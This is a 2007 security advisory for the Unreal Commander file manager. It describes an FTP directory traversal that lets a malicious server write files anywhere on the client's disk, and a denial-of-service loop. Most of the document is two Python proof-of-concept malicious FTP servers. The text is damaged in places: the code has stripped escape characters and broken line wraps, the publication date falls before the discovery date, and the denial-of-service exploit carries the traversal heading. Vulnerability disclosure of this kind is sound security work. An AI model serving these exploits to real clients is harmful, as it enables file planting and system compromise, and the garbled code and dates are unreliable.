HISPASEC
Security Advisory
http://blog.hispasec.com/lab/
Name : 2K7SEPT6 X-Diesel Unreal Commander v0.92 (build 573)
multiple FTP-based vulnerabilities
Class : Remote directory traversal, Remote DoS
Threat level : HIGH
Discovered : 2007-09-06
Published : 2007-08-24
Credit : Gynvael Coldwind
Vulnerable : 0.92 (build 573), 0.92 (build 565), prior also may be affected
== Abstract ==
Unreal Commander is an award winning freeware file manager for Windows
98/ME/2000/XP/2003/Vista. The application support multiple archive
formats, has a built-in ftp client, and other features.
Unreal Commander fails to correctly handle malformed file name while downloading
a remote file from a malformed FTP server to a local hard driver. This allows an
attacker to perform a directory traversal attack. Successful exploitation may
lead to a full scale system compromise.
Unreal Commander also fails to correctly handle FTP reponses. This can lead to
the application entering an infinite loop, denying service to the legitimate
user.
== Details ==
1. Remote FTP Directory Traversal
The FTP feature fails to correctly check the name of a file that is to be
downloaded. This filename can contain backslashes and dots, and these dots and
backslashes will be used as a part of a file name.
An example file list sent from the FTP server can look like this:
-rwxr-xr-x 2 ftp ftp 4096 Aug 1 02:28
st..........BackSlashPoC
When the user chooses to download the file (or a directory in which this file
exists), the Unreal Commander will try to create the file on a local harddrive
using the dots and backslashes as a part of a name.
Since more then enough .... will just bring the path to the disk root, the
attacker can choose any location on the disk to write the file to. The file can
for example overwrite a critical system file, or create a file in the Autostart
folder.
See Proof of Concept exploit at the bottom of this advisory.
2. Remote FTP DoS
When connecting to a malformed FTP, the Unreal Commander sends a CWD /
command. If the malformed FTP replies with a "550 CWD Operation not permitted"
message, the Unreal Commander tries to resend the command. The loop continues
until the remote FTP answers with a message about operation being successful.
If the remote FTP disconnects while Unreal Commander is still in the CWD loop,
the Unreal Commander will continue to remain in the loop.
The Unreal Commander does not react to Cancel/ALT+F4/ESC commands from the user,
the only way to exit the loop is to terminate the application.
See Proof of Concept exploit at the bottom of this advisory.
== Vendor status and solution ==
The vendor has been informed, but has not yet released a proper patch.
The solution is to check the file names of each file being downloaded from a
remote unknown FTP.
== Proof of Concept - Remote FTP Directory Traversal ==
# python FTP
# by Gynvael Coldwind
import socket
TransferSock = 0
def sendDirList (sock):
(DataSock, Address) = TransferSock.accept()
print "sendDirList: TransferSock accepted a connection"
sock.send("150 Opening ASCII mode data connection for file listrn");
DataSock.send("-rwxr-xr-x 2 ftp ftp 4096 Aug 1
02:28 st\..\..\..\..\..\..\BackSlashPoCn");
DataSock.close()
sock.send("226 Transfer complete.rn");
print "sendDirList: Transfer completern"
def sendFile (sock):
(DataSock, Address) = TransferSock.accept()
print "sendDirList: TransferSock accepted a connection"
sock.send("150 Opening BINARY mode data connection for sth (5 bytes)rn");
DataSock.send("Proof of Concept - Remote FTP Client directory
traversal vulnerability (G.C. - Hispasec)");
DataSock.close()
sock.send("226 Transfer complete.rn");
print "sendDirList: Transfer completern"
def handleUSER (sock, cmd, argz): sock.send("331 Password required for
userrn")
def handlePASS (sock, cmd, argz): sock.send("230 User logged in.rn")
def handleSYST (sock, cmd, argz): sock.send("215 UNIX Type: L8rn")
def handleFEAT (sock, cmd, argz): sock.send("211-Features:rn
MDTMrn REST STREAMrn211 Endrn");
def handleTYPE (sock, cmd, argz): sock.send("200 Type set to " + argz + "rn");
def handlePASV (sock, cmd, argz): sock.send("227 Entering Passive Mode
(127,0,0,1,10,10)rn");
def handlePWD (sock, cmd, argz): sock.send("257 "/" is current
directory.rn")
def handleCWD (sock, cmd, argz): sock.send("250 Requested file action
okay, completed.rn")
def handleLIST (sock, cmd, argz): sendDirList(sock)
def handleQUIT (sock, cmd, argz):
sock.send("Bye.rn")
sock.close()
def handleRETR (sock, cmd, argz):
if argz == "/":
sendDirList(sock)
else:
sendFile(sock)
def unknown (sock, cmd, argz): sock.send("550 " + cmd + ": Operation
not permittedrn")
handlers = {
'USER': handleUSER,
'PASS': handlePASS,
'SYST': handleSYST,
'FEAT': handleFEAT,
'TYPE': handleTYPE,
'PASV': handlePASV,
'PWD': handlePWD,
'CWD': handleCWD,
'LIST': handleLIST,
'QUIT': handleQUIT,
'RETR': handleRETR
}
ControlSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ControlSock.bind(("127.0.0.1", 2021))
ControlSock.listen(1)
TransferSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
TransferSock.bind(("127.0.0.1", 10 * 256 + 10))
TransferSock.listen(10)
# Control Sock loop
(ClientSock, Address) = ControlSock.accept()
ClientSock.send("220 PoCFTPD 1.2.3.4 Server ready.rn");
end = 0
while not end:
cmd = ClientSock.recv(1024)
print "Debug: recv -> " + cmd.strip()
command = (cmd[0:4]).strip()
argz = ((cmd.strip())[5:]).strip()
handlers.get(command, unknown)(ClientSock, command, argz)
== Proof of Concept - Remote FTP Directory Traversal ==
# python FTP DoS
# by Gynvael Coldwind
import socket
TransferSock = 0
def handleUSER (sock, cmd, argz): sock.send("331 Password required for
userrn")
def handlePASS (sock, cmd, argz): sock.send("230 User logged in.rn")
def handleSYST (sock, cmd, argz): sock.send("215 UNIX Type: L8rn")
def handleFEAT (sock, cmd, argz): sock.send("211-Features:rn
MDTMrn REST STREAMrn211 Endrn");
def handleTYPE (sock, cmd, argz): sock.send("200 Type set to " + argz + "rn");
def handlePASV (sock, cmd, argz): sock.send("227 Entering Passive Mode
(127,0,0,1,10,10)rn");
def handleQUIT (sock, cmd, argz):
sock.send("Bye.rn")
sock.close()
def unknown (sock, cmd, argz):
sock.send("550 " + cmd + ": Operation not permittedrn")
print "The Unreal Commander is not in an infinite loop. You may quit
this exploit, the infinite loop will last."
handlers = {
'USER': handleUSER,
'PASS': handlePASS,
'SYST': handleSYST,
'FEAT': handleFEAT,
'TYPE': handleTYPE,
'PASV': handlePASV,
'QUIT': handleQUIT
}
ControlSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ControlSock.bind(("127.0.0.1", 2021))
ControlSock.listen(1)
TransferSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
TransferSock.bind(("127.0.0.1", 10 * 256 + 10))
TransferSock.listen(10)
# Control Sock loop
(ClientSock, Address) = ControlSock.accept()
ClientSock.send("220 PoCFTPD 1.2.3.4 Server ready.rn");
end = 0
while not end:
cmd = ClientSock.recv(1024)
print "Debug: recv -> " + cmd.strip()
command = (cmd[0:4]).strip()
argz = ((cmd.strip())[5:]).strip()
handlers.get(command, unknown)(ClientSock, command, argz)
== Disclaimer ==
This document and all the information it contains is provided "as is",
without any warranty. Hispasec Sistemas is not responsible for the
misuse of the information provided in this advisory. The advisory is
provided for educational purposes only.
Permission is hereby granted to redistribute this advisory, providing
that no changes are made and that the copyright notices and
disclaimers remain intact.
Copyright (C) 2007 Hispasec Sistemas.
--
Gynvael Coldwind
mailto: michael AT hispasec DOT com
mailto: gynvael AT vexillium DOT org